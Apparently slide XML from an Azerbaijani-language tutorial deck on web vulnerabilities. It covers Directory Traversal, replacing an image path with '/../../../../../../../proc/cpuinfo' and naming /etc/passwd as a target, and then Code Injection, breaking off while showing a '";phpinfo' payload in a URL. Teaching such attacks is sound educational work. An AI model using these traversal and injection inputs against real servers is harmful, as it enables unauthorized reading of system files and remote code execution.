                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> seçirik və brauzerdə yeni shifəyə bu linki yapışdırırıq</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048742" name="Mətn Qutusu 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4604836" y="5135597"/>
            <a:ext cx="7324725" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Açılan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linkdə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hacker.png faylını göstərir.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Əgər shifədə Directory Traversal açığı mövcudsa biz linkə yazacağımız kodlar vasitəsiylə serverin digər fayllarını görə bilərik.</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10" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="4052" t="8897" b="2856"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8788851" cy="4727644"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097211" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="71956"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4727644"/>
            <a:ext cx="11790800" cy="2130356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048743" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8711029" y="15806"/>
            <a:ext cx="3480971" cy="1780541"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Serverdən lazımlı faylları özümüzə almaq üçün ilk öncə serverin fayl quruluşunu bilməliyik.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bizə lazım olacaq məlumatların hansı faylda olduğunu bilməliyik və həmən məlumatları tapmağa çalışmalıyıq</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048744" name="Mətn Qutusu 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8711029" y="1819648"/>
            <a:ext cx="3403148" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Məsələn bizə hədəfin prosessoru haqda məlumat lazımdırsa</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/proc/cpuinfo </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fayl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> məlumatı almalıyıq</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048745" name="Düzbucaqlı 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="15806"/>
            <a:ext cx="457201" cy="15564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46" name="Düzbucaqlı 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="561975"/>
            <a:ext cx="2657475" cy="542925"/>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47" name="Mətn Qutusu 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8711029" y="2935092"/>
            <a:ext cx="3079771" cy="1691641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bunun üçündə əvvəlki</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hacker.png </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>faylının yerinə</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/../../../../../../../proc/cpuinfo</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fayılının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> mövqeyini yazırıq</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>və ekrana sistemin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> su haqda məlumatı göstərir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12" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="4477" t="6187" r="29256"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="7256834" cy="5176002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097213" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="2732" b="65158"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4338536"/>
            <a:ext cx="12192001" cy="2519464"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048748" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7422204" y="194553"/>
            <a:ext cx="4523362" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Daha </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kritik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> fayllardan biridə </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc/passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fayl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ıdır</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bu faylda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>istifadəçlərin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> verilənlər bazası olur.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48749" name="Başlıq 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263651" y="120777"/>
            <a:ext cx="8526451" cy="2135077"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="7200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="7200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İnjection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      Təhlükəsizlik açığı</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048750" name="Mətn Qutusu 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="87549" y="2373549"/>
            <a:ext cx="11822349" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enjeksiyonu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> nədir</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="az-Latn-AZ" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uzaqdan kod icrası adlanan kod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enjeksiyonu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Təcavüzkarın bir tətbiqə zərərli kodu yeridib icra etmək qabiliyyəti tərəfindən edilən bir hücumdur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="az-Latn-AZ" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bu xarici kod, məlumat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>təhlükəsizliyini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pozmaq, verilənlər bazası bütövlüyünü və ya xüsusi mülkiyyəti təhlükə altına almaq qabiliyyətinə malikdir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="az-Latn-AZ" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bir çox hallarda, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>identifikasiya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> yoxlanışını ötə bilər. Ümumiyyətlə bu hücumlar icra üçün istifadəçi girişindən asılı olan tətbiqetmələrlə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>əlaqələndirilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="az-Latn-AZ" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ümumiyyətlə, tətbiqetmə ilk keçiddən keçmədən icra edildikdə tətbiqlər daha həssasdır.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048878" name="Metin kutusu 1048877"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9106185" y="859709"/>
            <a:ext cx="1918649" cy="1513839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr" sz="9600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✅</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="28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14" name="Şəkil 4" descr="Şəkil ehtiva edir stol  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="9027565" cy="3964481"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097215" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="3964481"/>
            <a:ext cx="10741095" cy="2893519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048751" name="Düzbucaqlı 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2943225" y="2371725"/>
            <a:ext cx="2295525" cy="145732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52" name="Mətn Qutusu 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9027564" y="215863"/>
            <a:ext cx="3038475" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Açılan shifədə linkdəki hacker yazısı yerinə bəzi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> və.s kodları yazaraq serverdən məlumat toplamağa çalışacayıq.</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16" name="Şəkil 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8014198" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048753" name="Mətn Qutusu 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8134350" y="285750"/>
            <a:ext cx="4057650" cy="5781040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hacker yaz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ısının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> yerinə </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
